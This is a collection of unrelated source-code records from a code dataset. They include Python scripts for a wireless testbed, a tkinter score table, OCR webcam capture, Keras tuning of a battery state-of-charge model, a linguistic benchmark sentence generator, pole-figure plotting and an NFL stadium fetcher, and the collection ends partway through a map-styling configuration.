infrastructure BSS\n\n :param node: elected station node by associate\n :param essid: the SSID\n \"\"\"\n\n # # UPI_R function is execute immediately\n # exec_time = None\n #\n # eth_ipAddress_part = re.split(r'[:./\\s]\\s*', str(node))\n # wlan_ipAddress = '192.168.3.' + eth_ipAddress_part[6]\n # UPIfunc = UPI_M.initTest\n # UPIargs = {'interface' : 'wlan0', 'operation' : ['association'], 'ssid' : [essid], 'ip_address' : [wlan_ipAddress] }\n # try:\n # rvalue = self.global_mgr.runAt(node, UPIfunc, UPIargs, exec_time)\n # self.log.info('Ret value of blocking call is %s' % str(rvalue))\n # except Exception as e:\n # self.log.fatal(\"An error occurred : %s\" % e)\n # return False\n\n def initializeTestbedFunctions(self, controller):\n \"\"\" Setups all the node in the experiment, executes the follow operation :\n installs the execution environment or execution engine\n restarts module and microcode\n executes the node role\n\n :return result: True if the operation are successful execute, False otherwise\n \"\"\"\n\n self.log.info(' %s - SETUP NODES' % self.initializeTestbedFunctions.__name__)\n\n # All the UPI functions are execute immediately\n # UPIargs = {'execution_engine' : ['runtime/connectors/wmp_linux/execution_engine/factory'] }\n # rvalue = controller.nodes(self.ap1).radio.iface(\"wlan0\").install_execution_engine(UPIargs)\n # self.log.debug('Ret value of blocking call is %s' % str(rvalue))\n # UPIargs = {'interface' : 'wlan0', 'operation' : ['module'] }\n # rvalue = controller.nodes(self.ap1).radio.iface(\"wlan0\").init_test(UPIargs)\n # self.log.debug('Ret value of blocking call is %s' % str(rvalue))\n\n UPIargs = {'execution_engine' : ['../../../agent_modules/wifi_wmp/execution_engine/wmp'] }\n #UPIargs = {'execution_engine' : ['.... /execution_engine/medca-openfwwf-logcw'] }\n rvalue = controller.nodes(self.wmp_nodes).radio.iface(\"wlan0\").install_execution_engine(UPIargs)\n self.log.debug('Ret value of blocking call is %s' % str(rvalue))\n UPIargs = {'interface' : 'wlan0', 'operation' : ['module'] }\n rvalue = controller.nodes(self.wmp_nodes).radio.iface(\"wlan0\").init_test(UPIargs)\n self.log.debug('Ret value of blocking call is %s' % str(rvalue))\n\n self.log.debug('ath_nodes_number : %s - wmp_nodes_number : %s' % (str(self.ath_nodes_number), str(self.wmp_nodes_number) ) )\n self.log.debug('len ath_nodes_number : %s - len wmp_nodes_number : %s' % (str(len(self.athnodes)), str(len(self.wifinodes) ) ) )\n\n # self.setAP(self.ap1, self.exp_group_name)\n # node_index = 0\n # while node_index < self.wmp_nodes_number :\n # self.setSTA(self.wifinodes[node_index], self.exp_group_name)\n # node_index += 1\n #\n # self.log.warning('Configure EDCA parameters for each hardware queue in wireless card (Atheros AR928X)')\n # # queueParam0 = EdcaQueueParameters(aifs=1, cwmin=1, cwmax=3, txop=900)\n # # queueParam1 = EdcaQueueParameters(aifs=50, cwmin=15, cwmax=63, txop=4)\n # # queueParam2 = EdcaQueueParameters(aifs=55, cwmin=63, cwmax=127, txop=2)\n # # queueParam3 = EdcaQueueParameters(aifs=123, cwmin=127, cwmax=511, txop=0)\n # queueParam0 = EdcaQueueParameters(aifs=3, cwmin=30, cwmax=30, txop=1)\n # queueParam1 = EdcaQueueParameters(aifs=3, cwmin=30, cwmax=30, txop=1)\n # queueParam2 = EdcaQueueParameters(aifs=3, cwmin=30, cwmax=30, txop=1)\n # queueParam3 = EdcaQueueParameters(aifs=3, cwmin=30, cwmax=30, txop=1)\n #\n # node_index = 0\n # while node_index < self.ath_nodes_number :\n # self.setSTA(self.athnodes[node_index], self.exp_group_name)\n #\n # self.radioHelper.setEdcaParameters(self.athnodes[node_index], ifname='wlan0', queueId=0, qParam=queueParam0)\n # self.radioHelper.setEdcaParameters(self.athnodes[node_index], ifname='wlan0', queueId=1, qParam=queueParam1)\n # self.radioHelper.setEdcaParameters(self.athnodes[node_index], ifname='wlan0', queueId=2, qParam=queueParam2)\n # self.radioHelper.setEdcaParameters(self.athnodes[node_index], ifname='wlan0', queueId=3, qParam=queueParam3)\n #\n # qParams = self.radioHelper.getEdcaParameters(self.athnodes[node_index], ifname='wlan0')\n # self.radioHelper.printEdcaParameters(self.athnodes[node_index], ifname='wlan0', qParam=qParams)\n # node_index += 1\n\n return True\n","sub_path":"wmp/wmp_remote_controller/wmp_helper/TestbedTopology.py","file_name":"TestbedTopology.py","file_ext":"py","file_size_in_byte":9404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"299116630","text":"import tkinter as tk\nimport tkinter.ttk as ttk\n\nfrom sqlite3 import *\n\n\nclass Table(tk.Frame):\n def __init__(self, parent=None, headings=tuple(), rows=tuple()):\n super().__init__(parent)\n\n table = ttk.Treeview(self, show=\"headings\", selectmode=\"browse\")\n table[\"columns\"] = headings\n table[\"displaycolumns\"] = headings\n\n for head in headings:\n table.heading(head, text=head, anchor=tk.CENTER)\n table.column(head, anchor=tk.CENTER)\n\n for row in rows:\n table.insert('', tk.END, values=tuple(row))\n\n scrolltable = tk.Scrollbar(self, command=table.yview)\n table.configure(yscrollcommand=scrolltable.set)\n scrolltable.pack(side=tk.RIGHT, fill=tk.Y)\n table.pack(expand=tk.YES, fill=tk.BOTH)\n\n\nclass records:\n def __init__(self):\n root = tk.Tk()\n root.title('Рекорды')\n names = (\n 'Сортировка \"пузырьком\".', 'Сортировка \"Вставками\"', '\"Быстрая\" сортировка.',\n '\"Быстрая\" сортировка с асинхронностью.',\n 'Сортировка подсчётом.')\n conn = connect('project_trpo')\n cursor = conn.cursor()\n cursor.execute(\"SELECT USERNAME, result, topic FROM Records ORDER BY topic, result DESC\")\n table = Table(root, headings=('Имя пользователя', 'Результат', 'Тема'),\n rows=tuple(((*polya, names[topic]) for *polya, topic in cursor.fetchall())))\n table.pack(expand=tk.YES, fill=tk.BOTH)\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n records()\n","sub_path":"records.py","file_name":"records.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"492471488","text":"import logging\nfrom typing import Union\n\nfrom twisted.internet.defer import Deferred, inlineCallbacks\n\nfrom peek_plugin_diagram._private.client.controller.GridCacheController import \\\n GridCacheController\nfrom vortex.Payload import Payload\nfrom vortex.TupleSelector import TupleSelector\nfrom vortex.handler.TupleDataObservableHandler import TuplesProviderABC\n\nlogger = logging.getLogger(__name__)\n\n\nclass GridCacheIndexTupleProvider(TuplesProviderABC):\n def __init__(self, gridCacheController: GridCacheController):\n self._gridCacheController = gridCacheController\n\n @inlineCallbacks\n def makeVortexMsg(self, filt: dict,\n tupleSelector: TupleSelector) -> Union[Deferred, bytes]:\n tuples = [\n [i[0], i[1]]\n for i in self._gridCacheController.encodedChunkLastUpdateByKey().items()\n ]\n sorted(tuples, key=lambda i: i[0])\n\n start = tupleSelector.selector.get('start')\n count = tupleSelector.selector.get('count')\n\n if start is not None and count:\n tuples = tuples[start:count]\n\n payloadEnvelope = yield Payload(filt, tuples=tuples).makePayloadEnvelopeDefer()\n vortexMsg = yield payloadEnvelope.toVortexMsgDefer()\n return vortexMsg\n","sub_path":"peek_plugin_diagram/_private/client/tuple_providers/GridCacheIndexTupleProvider.py","file_name":"GridCacheIndexTupleProvider.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"26496494","text":"from utils import data_generator\nfrom utils.constituent_building import *\nfrom utils.conjugate import *\nfrom utils.randomize import choice\n\nclass CSCGenerator(data_generator.BenchmarkGenerator):\n def __init__(self):\n super().__init__(field=\"syntax\",\n linguistics=\"island_effects\",\n uid=\"complex_NP_island\",\n simple_lm_method=True,\n one_prefix_method=False,\n two_prefix_method=False,\n lexically_identical=True)\n\n self.predicates = np.union1d(all_refl_preds, get_all(\"category_2\", \"Adj_comp_than\"))\n self.safe_subjs = np.setdiff1d(all_nominals, all_proper_names)\n\n def sample(self):\n # Who did the man that helped John see?\n # wh Aux_mat Subj Rel Aux_emb V_emb Obj V_mat\n # Who did John see the man that helped?\n # wh Aux_mat Obj V_mat Subj Rel Aux_emb V_emb\n\n V_mat = choice(get_all(\"finite\", \"0\", self.predicates))\n Subj = N_to_DP_mutate(choice(\n get_matches_of(V_mat, \"arg_2\",\n get_matches_of(V_mat, \"arg_1\", self.safe_subjs))))\n Aux_mat = return_aux(V_mat, Subj)\n V_emb = choice(get_matched_by(Subj, \"arg_1\", self.predicates))\n Aux_emb = return_aux(V_emb, Subj)\n Obj = N_to_DP_mutate(choice(\n get_matches_of(V_emb, \"arg_2\",\n get_matches_of(V_mat, \"arg_1\",\n get_matches_of(Aux_mat, \"arg_1\", all_nominals)))))\n Wh = choice(get_matches_of(V_mat, \"arg_2\",\n get_matches_of(V_emb, \"arg_2\", all_wh_words)))\n Rel = choice(get_matched_by(Subj, \"arg_1\", all_relativizers))\n\n data = {\n \"sentence_good\": \"%s %s %s %s %s %s %s %s?\" % (Wh[0], Aux_mat[0], Subj[0], Rel[0], Aux_emb[0], V_emb[0], Obj[0], V_mat[0]),\n \"sentence_bad\": \"%s %s %s %s %s %s %s %s?\" % (Wh[0], Aux_mat[0], Obj[0], V_mat[0], Subj[0], Rel[0], Aux_emb[0], V_emb[0])\n }\n return data, data[\"sentence_good\"]\n\ngenerator = CSCGenerator()\ngenerator.generate_paradigm(rel_output_path=\"outputs/benchmark/%s.jsonl\" % generator.uid)\n\n","sub_path":"Spanish_Benchmark/English_Categories/island_effects/complex_NP_island.py","file_name":"complex_NP_island.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"85234171","text":"import time\r\n\r\n#py tesseract (also works with Raspbery Py)\r\nimport pytesseract\r\n#Open CV (also works with Raspbery Py)\r\nimport cv2\r\n\r\nimport os\r\nfrom PIL import Image, ImageEnhance, ImageFilter\r\ntessdata_dir_config = '--psm 6 --tessdata-dir \"C:\\\\Program Files (x86)\\\\Tesseract-OCR\\\\tessdata\"'\r\n# Example config: '--tessdata-dir \"C:\\\\Program Files (x86)\\\\Tesseract-OCR\\\\tessdata\"'\r\n# It's important to include double quotes around the dir path.\r\ncamera_port = 1\r\ncamera = cv2.VideoCapture(camera_port)\r\ntime.sleep(0.1) \r\n\r\nif not os.path.exists('Images/image_frames'):\r\n\tos.makedirs('Images/image_frames')\r\n\r\nindex=0\r\nwhile camera.isOpened():\r\n\tret,frame=camera.read()\r\n\tindex=index+1\r\n\tif ((index%1)==0):\r\n\t\timgH, imgW, _ = frame.shape\r\n\t\tx1,y1,w1,h1=0,0,imgH,imgW\r\n\t\ttext = pytesseract.image_to_string(frame, lang = 'eng')\r\n\t\timageBoxes = pytesseract.image_to_boxes(frame)\r\n\t\tfor boxes in imageBoxes.splitlines():\r\n\t\t\tboxes= boxes.split(' ')\r\n\t\t\tx,y,w,h=int(boxes[1]),int(boxes[2]),int(boxes[3]),int(boxes[4])\r\n\t\t\tcv2.rectangle(frame,(x,imgH-y),(w, imgH-h),(0,255,0),3)\t\r\n\r\n\r\n\t\tif (text.find('CAT') != -1):\r\n\t\t\ttext= \"Yayyyy its a CAT!\"\r\n\t\t\r\n\r\n\t\tcv2.putText(frame,text, (x1+int(w1/50),y1+int(h1/50)), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,255), 2)\r\n\t\tfont=cv2.FONT_HERSHEY_SIMPLEX\r\n\t\tcv2.imshow('OCR', frame)\r\n\t\tif cv2.waitKey(2) & 0xFF == ord('q'):\r\n\t\t\tbreak\r\n\t#name = './Images/image_frames' + str(index) + '.png'\r\n\t#print ('frames')\r\n\t# cv2.imwrite(name,frame)\r\n\t\r\n\t#if cv2.waitkey(10)& 0xff == ord('q'):\r\n\t#\tbreak\r\n\r\ncamera.release()\r\ncv2.destroyAllWindows()","sub_path":"Clay OCR.py","file_name":"Clay OCR.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"214899214","text":"import argparse\nimport logging\n\nimport os\nimport keras\nimport numpy as np\nfrom keras import backend as K\nfrom keras.callbacks import TensorBoard\n\nimport nni\n\nfrom keras.models import Sequential\nfrom keras.layers import SimpleRNN, Dense\n\nfrom pandas import read_csv\nfrom sklearn.preprocessing import LabelBinarizer\n\nLOG = logging.getLogger('mnist_soc_annot')\n\nlook_back = 15\nfeature = 3 # voltage and current and temp\n\nlogger = logging.getLogger('mnist_AutoML')\n\nclass socNetwork(object):\n '''\n For initializing and building the deep learning network\n '''\n \n \n def __init__(self, \n hidden_size_1, hidden_size_2, hidden_size_3):\n \"\"\"@nni.variable(nni.choice(8, 64, 128), name=self.hidden_size_1)\"\"\"\n self.hidden_size_1 = hidden_size_1\n \"\"\"@nni.variable(nni.choice(8, 64, 128), name=self.hidden_size_2)\"\"\"\n self.hidden_size_2 = hidden_size_2\n \"\"\"@nni.variable(nni.choice(8, 64, 128), name=self.hidden_size_3)\"\"\"\n self.hidden_size_3 = hidden_size_3\n \n \n def build_network(self):\n '''\n Build the network\n '''\n model = Sequential()\n model.add(SimpleRNN(self.hidden_size_1, input_shape=(look_back, feature), return_sequences=True))\n model.add(SimpleRNN(self.hidden_size_2, return_sequences=True))\n model.add(SimpleRNN(self.hidden_size_3))\n model.add(Dense(1, activation='sigmoid'))\n model.compile(loss='mse', optimizer='Adam', metrics=['mse'])\n return model\n \n def train(self, trainX, trainY, textX, testY):\n model = self.build_network()\n model.fit(x=trainX, y=trainY, validation_split=0.15, epochs=5)\n \n _, score = model.evaluate(textX, testY, verbose=0)\n logger.debug('Final result is: %d', score)\n logger.debug('Send final result done.')\n \"\"\"@nni.report_final_result(score)\"\"\"\n\n \n\ndef main(params):\n '''\n Main function, build mnist network, run and send result to NNI.\n '''\n dataframe_trainset = read_csv(\n 'dataset/different_cycle_train_test/train_FUDS_BJDST_US06.csv', header=0, index_col=0)\n dataframe_testset = read_csv(\n 'dataset/different_cycle_train_test/test_DST.csv', header=0, index_col=0)\n \n def create_dataset(dataset, look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-look_back-1):\n # use first and second column in the dataset\n a = dataset[i:(i+look_back), 0:3]\n dataX.append(a)\n # the output is at the third column of the dataset\n dataY.append(dataset[i + look_back, 3])\n return np.array(dataX), np.array(dataY)\n \n train_dataset = dataframe_trainset.values\n test_dataset = dataframe_testset.values\n \n trainX, trainY = create_dataset(train_dataset, look_back)\n testX, testY = create_dataset(test_dataset, look_back)\n \n soc_network = socNetwork(hidden_size_1=params['hidden_size_1'], hidden_size_2=params['hidden_size_2'], hidden_size_3=params['hidden_size_3'])\n soc_network.build_network()\n soc_network.train(trainX, trainY, testX, testY)\n \n\n\ndef get_params():\n ''' Get parameters from command line '''\n parser = argparse.ArgumentParser()\n # parser.add_argument(\"--data_dir\", type=str, default='/tmp/tensorflow/mnist/input_data', help=\"data directory\")\n # parser.add_argument(\"--dropout_rate\", type=float, default=0.5, help=\"dropout rate\")\n # parser.add_argument(\"--channel_1_num\", type=int, default=32)\n # parser.add_argument(\"--channel_2_num\", type=int, default=64)\n # parser.add_argument(\"--conv_size\", type=int, default=5)\n # parser.add_argument(\"--pool_size\", type=int, default=2)\n parser.add_argument(\"--hidden_size_1\", type=int, default=8)\n parser.add_argument(\"--hidden_size_2\", type=int, default=8)\n parser.add_argument(\"--hidden_size_3\", type=int, default=8)\n # parser.add_argument(\"--learning_rate\", type=float, default=1e-4)\n # parser.add_argument(\"--batch_num\", type=int, default=2000)\n # parser.add_argument(\"--batch_size\", type=int, default=32)\n\n args, _ = parser.parse_known_args()\n return args\n\n\n\nif __name__ == \"__main__\":\n '''@nni.get_next_parameter()'''\n try:\n main(vars(get_params()))\n except Exception as exception:\n logger.exception(exception)\n raise\n","sub_path":"Objective_2/Hyperparam_tuning/soc_nni_annot_rnn/soc-keras_annot.py","file_name":"soc-keras_annot.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"285640970","text":"from .base import BaseField\nfrom protobuf3.wire_types import FIELD_VARINT\n\n\nclass Int32Field(BaseField):\n DEFAULT_VALUE = 0\n WIRE_TYPE = FIELD_VARINT\n\n def _convert_to_final_type(self, value):\n if value >= 2 ** 31:\n return -(2 ** 64 - value)\n\n return value\n\n def _convert_to_wire_type(self, value):\n if value < 0:\n return 2 ** 64 + value\n\n return value\n\n def _validate(self, value):\n return isinstance(value, int) and -2 ** 31 <= value < 2 ** 31\n","sub_path":"garbagebot/lib/python3.6/site-packages/protobuf3/fields/int32.py","file_name":"int32.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"10300645","text":"#creating pole figures from synchrotrone SUMM INTEGRATED data\n\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nfor i in range (1,2):\n peaks = [1,4,5,6,7,8,9]\n\n print (peaks [i])\n loaddir = \"/home/ivanov/SYN/TiTaNb5/2D/SUMM/POLE/NORM/1_-80-0/peak_%s\"%peaks[i]\n savedir = \"/home/ivanov/SYN/TiTaNb5/2D/SUMM/POLE/NORM/1_-80-0/peak_%s\"%peaks[i]\n loadfile = os.path.join(loaddir, \"intlist_peak%s.txt\"%peaks[i])\n\n intensity = np.array (np.loadtxt(loadfile))\n #intensity=np.ma.masked_where(intensity<1,intensity)\n #icorrm=[]\n #omega = 80\n #mu = 911.5638000000001 # sm**-1\n #t = 0.1 # sm\n #theta = [3.1795, 3.6205, 4.7005, 4.9525, 5.5105, 6.0685, 6.3655]\n\n #corrections\n\n #for j in range(81):\n # for k in range (360):\n # R = (np.cos(np.radians(theta[i]))*(np.exp(-mu*t/np.cos(np.radians(theta[i]-omega)))-\n # np.exp(-mu*t/np.cos(np.radians(theta[i]+omega))))/\n # mu*t*np.exp(-mu*t/np.cos(np.radians(theta[i])))*\n # (np.cos(np.radians(theta[i]-omega))/np.cos(np.radians(theta[i]+omega))-1))#*intensity[80,k]\n\n # intensity [j,k] = intensity[j,k]*R\n\n # omega = omega - 1\n #print (j, k, omega)\n #print(R)\n # icorrm.append(R)\n\n #icorrm=np.array(icorrm)\n #print (icorrm)\n #omega = np.linspace(0,80,81)\n #I, O = np.meshgrid (icorrm, omega)\n #plt.plot(I)\n #plt.show()\n\n plt.imshow(intensity, cmap=cm.jet)\n savefile = os.path.join(savedir, \"map_%s\" % peaks[i] + \".png\")\n plt.savefig(savefile, dpi=300)\n plt.show()\n plt.clf()\n\n\n beta = np.radians(np.linspace(0, 360, 360))\n alpha = np.radians(np.linspace(0, 81, 81))\n B, A = np.meshgrid (beta, alpha)\n\n ax = plt.subplot(111, polar=True)\n ax.set_yticklabels([])\n\n ctf = ax.contourf(B, A, intensity, 300, cmap=cm.jet)\n plt.colorbar(ctf)\n plt.grid(False)\n plt.show()\n\n savefile = os.path.join(savedir, \"polar_fig_%s\"%peaks[i] + \".png\")\n plt.savefig(savefile, dpi=300)\n plt.clf()\n\n\n","sub_path":"DESY_2017/Texture/linux/5. polefigures_draw.py","file_name":"5. polefigures_draw.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233002942","text":"import requests\nfrom models.stadium import StadiumModel\n\n\nclass StadiumController:\n nfl_endpoint = 'https://feeds.nfl.com/feeds-rs/scores.json'\n\n @classmethod\n def populate_stadiums(cls):\n rss_feed = requests.get(cls.nfl_endpoint)\n\n json_data = rss_feed.json()\n\n games = json_data['gameScores']\n\n for game in games:\n schedule_info = game['gameSchedule']\n stadium_info = schedule_info['site']\n\n stadium = StadiumModel.find_by_id(stadium_info['siteId'])\n\n if not stadium:\n new_stadium_id = stadium_info['siteId']\n new_stadium_city = stadium_info['siteCity']\n new_stadium_name = stadium_info['siteFullname']\n new_stadium_state = stadium_info['siteState']\n new_stadium_roof_type = stadium_info['roofType']\n new_stadium = StadiumModel(new_stadium_id, new_stadium_city, new_stadium_name, new_stadium_state,\n new_stadium_roof_type)\n new_stadium.upsert()\n\n stadiums = StadiumModel.find_all()\n return {'stadiums': [stadium.json() for stadium in stadiums]}\n\n\n\n\n\n\n\n\n\n\n","sub_path":"controllers/stadium.py","file_name":"stadium.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"8488205","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nlayer_suffixes = {\n 0: 0,\n 1: 1,\n 2: 2,\n 3: 3,\n 4: 4,\n 5: 5,\n 6: 6,\n 7: 7,\n 8: 8,\n 9: 9,\n 10: 10,\n 11: 11,\n 12: 12,\n 13: 13,\n 14: 14,\n 15: 15,\n 16: 16,\n 17: 17,\n 18: 18\n}\n\nmaxscales = {\n 0: 99999999999,\n 1: 332808204,\n 2: 166404102,\n 3: 83202051,\n 4: 41601025,\n 5: 20800512,\n 6: 10400256,\n 7: 5200128,\n 8: 2600064,\n 9: 1300032,\n 10: 650016,\n 11: 325008,\n 12: 162504,\n 13: 81252,\n 14: 40626,\n 15: 20313,\n 16: 10156,\n 17: 5078,\n 18: 2539\n}\n\nminscales = {\n 0: 332808204,\n 1: 166404102,\n 2: 83202051,\n 3: 41601025,\n 4: 20800512,\n 5: 10400256,\n 6: 5200128,\n 7: 2600064,\n 8: 1300032,\n 9: 650016,\n 10: 325008,\n 11: 162504,\n 12: 81252,\n 13: 40626,\n 14: 20313,\n 15: 10156,\n 16: 5078,\n 17: 2539,\n 18: 0\n}\n\ndefault = {\n 'layer_suffix': layer_suffixes,\n 'maxscale': maxscales,\n 'minscale': minscales,\n\n 'land_clr': '\"#E8E6E1\"',\n 'land_data': {\n 0: '\"data/simplified_land_polygons\"',\n 9: '\"data/land_polygons\"'\n },\n 'land_epsg': {\n 0: '\"init=epsg:3857\"',\n },\n\n ##### water #####\n 'waterarea_data': {\n 0: '\"geometry from (select geometry,osm_id ,OSM_NAME_COLUMN as name,type from OSM_PREFIX_waterareas_gen0) as foo using unique osm_id using srid=OSM_SRID\"',\n 9: '\"geometry from (select geometry,osm_id ,OSM_NAME_COLUMN as name,type from OSM_PREFIX_waterareas_gen1) as foo using unique osm_id using srid=OSM_SRID\"',\n 12: '\"geometry from (select geometry,osm_id ,OSM_NAME_COLUMN as name,type from OSM_PREFIX_waterareas) as foo using unique osm_id using srid=OSM_SRID\"'\n },\n 'display_waterarea_lbl' : {\n 0: 0,\n 6: 1\n },\n 'waterarea_clr': '\"#B3C6D4\"',\n 'waterarea_ol_clr': '\"#B3C6D4\"',\n 'waterarea_ol_width': 0,\n 'waterarea_font': \"sc\",\n 'waterarea_lbl_size': 8,\n 'waterarea_lbl_clr': '\"#6B94B0\"',\n 'waterarea_lbl_ol_clr': \"255 255 255\",\n 'waterarea_lbl_ol_width': 2,\n 'ocean_clr': '\"#B3C6D4\"',\n\n 'display_waterways': {\n 0: 0,\n 6: 1\n },\n 'waterways_data': {\n 0: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_waterways_gen0 where type=\\'river\\') as foo using unique osm_id using srid=OSM_SRID\"',\n 9: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_waterways_gen1 where type=\\'river\\') as foo using unique osm_id using srid=OSM_SRID\"',\n 12: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_waterways) as foo using unique osm_id using srid=OSM_SRID\"'\n },\n\n 'canal_width': {\n 0: 0,\n 10: 0.5,\n 12: 1,\n 14: 2,\n 15: 4,\n 16: 8,\n 17: 16,\n 18: 30\n },\n 'display_canal_lbl' : {\n 0: 0,\n 10: 1\n },\n 'canal_clr': '\"#B3C6D4\"',\n 'canal_font': \"sc\",\n 'canal_lbl_size': 8,\n 'canal_lbl_clr': '\"#6B94B0\"',\n 'canal_lbl_ol_clr': \"255 255 255\",\n 'canal_lbl_ol_width': 2,\n\n 'stream_width': {\n 0: 0,\n 10: 0.5,\n 12: 1,\n 14: 2\n },\n 'display_stream_lbl' : {\n 0: 0, 12: 1\n },\n 'stream_clr': '\"#B3C6D4\"',\n 'stream_font': \"sc\",\n 'stream_lbl_size': 8,\n 'stream_lbl_clr': '\"#6B94B0\"',\n 'stream_lbl_ol_clr': \"255 255 255\",\n 'stream_lbl_ol_width': 2,\n\n 'river_width': {\n 0: 0,\n 6: 0.15,\n 7: 0.25,\n 8: 0.5,\n 9: 1,\n 11: 2,\n 13: 3,\n 15: 4,\n 16: 5,\n 17: 6,\n 18: 7\n },\n 'display_river_lbl' : {\n 0: 0,\n 6: 1\n },\n 'river_clr': '\"#B3C6D4\"',\n 'river_font': \"sc\",\n 'river_lbl_size': {\n 0: 8,\n 15: 9,\n 17: 10\n },\n 'river_lbl_clr': '\"#6B94B0\"',\n 'river_lbl_ol_clr': \"255 255 255\",\n 'river_lbl_ol_width': 2,\n\n ##### landusage ######\n 'display_landusage': {\n 0: 0,\n 4: 1\n },\n\n 'landusage_data': {\n 0: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_landusages_gen00) as foo using unique osm_id using srid=OSM_SRID\"',\n 6: '\"geometry from (select geometry,osm_id,type,OSM_NAME_COLUMN as name from OSM_PREFIX_landusages_gen0) as foo using unique osm_id using srid=OSM_SRID\"',\n 9: '\"geometry from (select geometry ,osm_id, type, OSM_NAME_COLUMN as name from OSM_PREFIX_landusages_gen1 where type in (\\'forest\\',\\'wood\\',\\'farmland\\',\\'orchard\\',\\'vineyard\\',\\'plant_nursery\\',\\'grass\\',\\'grassland\\',\\'meadow\\',\\'scrub\\'\\'industrial\\',\\'commercial\\',\\'residential\\')) as foo using unique osm_id using srid=OSM_SRID\"',\n 10: '\"geometry from (select geometry ,osm_id, type, OSM_NAME_COLUMN as name from OSM_PREFIX_landusages_gen1 where type in (\\'forest\\',\\'wood\\',\\'farmland\\',\\'orchard\\',\\'vineyard\\',\\'plant_nursery\\',\\'grass\\',\\'grassland\\',\\'meadow\\',\\'village_green\\',\\'garden\\',\\'pedestrian\\',\\'cemetery\\',\\'industrial\\',\\'commercial\\',\\'brownfield\\',\\'residential\\',\\'school\\',\\'college\\',\\'university\\',\\'military\\',\\'park\\',\\'golf_course\\',\\'heath\\',\\'scrub\\',\\'hospital\\',\\'parking\\',\\'stadium\\',\\'sports_center\\',\\'pitch\\') order by area desc) as foo using unique osm_id using srid=OSM_SRID\"',\n 12: '\"geometry from (select geometry ,osm_id, type, OSM_NAME_COLUMN as name from OSM_PREFIX_landusages where type in (\\'forest\\',\\'wood\\',\\'farmland\\',\\'orchard\\',\\'vineyard\\',\\'plant_nursery\\',\\'grass\\',\\'grassland\\',\\'meadow\\',\\'village_green\\',\\'garden\\',\\'pedestrian\\',\\'cemetery\\',\\'industrial\\',\\'commercial\\',\\'brownfield\\',\\'residential\\',\\'school\\',\\'college\\',\\'university\\',\\'military\\',\\'park\\',\\'golf_course\\',\\'heath\\',\\'scrub\\',\\'hospital\\',\\'parking\\',\\'stadium\\',\\'sports_center\\',\\'pitch\\') order by area desc) as foo using unique osm_id using srid=OSM_SRID\"'\n },\n\n 'industrial_clr': '\"#d1d1d1\"',\n 'industrial_ol_clr': '\"#d1d1d1\"',\n 'industrial_ol_width': 0,\n 'display_industrial_lbl' : {\n 0: 0,\n 11: 1\n },\n 'industrial_font': \"sc\",\n 'industrial_lbl_size': 8,\n 'industrial_lbl_clr': '0 0 0',\n 'industrial_lbl_ol_clr': \"255 255 255\",\n 'industrial_lbl_ol_width': 2,\n\n 'display_residential': 1,\n 'residential_clr': '\"#E3DED4\"',\n 'residential_ol_clr': '\"#E3DED4\"',\n 'residential_ol_width': 0,\n 'display_residential_lbl' : {\n 0: 0,\n 12: 1\n },\n 'residential_font': \"sc\",\n 'residential_lbl_size': 8,\n 'residential_lbl_clr': '0 0 0',\n 'residential_lbl_ol_clr': \"255 255 255\",\n 'residential_lbl_ol_width': 2,\n\n 'park_clr': '\"#DCDCB4\"',\n 'display_park_lbl' : {0: 0, 11:1},\n 'park_font': \"sc\",\n 'park_lbl_size': 8,\n 'park_lbl_clr': '0 0 0',\n 'park_lbl_ol_clr': \"255 255 255\",\n 'park_lbl_ol_width': 2,\n\n 'hospital_clr': '\"#E6C8C3\"',\n 'display_hospital_lbl' : {0: 0, 12:1},\n 'hospital_font': \"sc\",\n 'hospital_lbl_size': 8,\n 'hospital_lbl_clr': '0 0 0',\n 'hospital_lbl_ol_clr': \"255 255 255\",\n 'hospital_lbl_ol_width': 2,\n\n 'education_clr': '\"#DED1AB\"',\n 'display_education_lbl' : {0: 0, 12:1},\n 'education_font': \"sc\",\n 'education_lbl_size': 8,\n 'education_lbl_clr': '0 0 0',\n 'education_lbl_ol_clr': \"255 255 255\",\n 'education_lbl_ol_width': 2,\n\n 'sports_clr': '\"#DED1AB\"',\n 'display_sports_lbl' : {0: 0, 12:1},\n 'sports_font': \"sc\",\n 'sports_lbl_size': 8,\n 'sports_lbl_clr': '0 0 0',\n 'sports_lbl_ol_clr': \"255 255 255\",\n 'sports_lbl_ol_width': 2,\n\n 'cemetery_clr': '\"#d1d1d1\"',\n 'display_cemetery_lbl' : {0: 0, 12:1},\n 'cemetery_font': \"sc\",\n 'cemetery_lbl_size': 8,\n 'cemetery_lbl_clr': '0 0 0',\n 'cemetery_lbl_ol_clr': \"255 255 255\",\n 'cemetery_lbl_ol_width': 2,\n\n 'forest_clr': '\"#C2D1B2\"',\n 'display_forest_lbl' : {0: 0, 12:1},\n 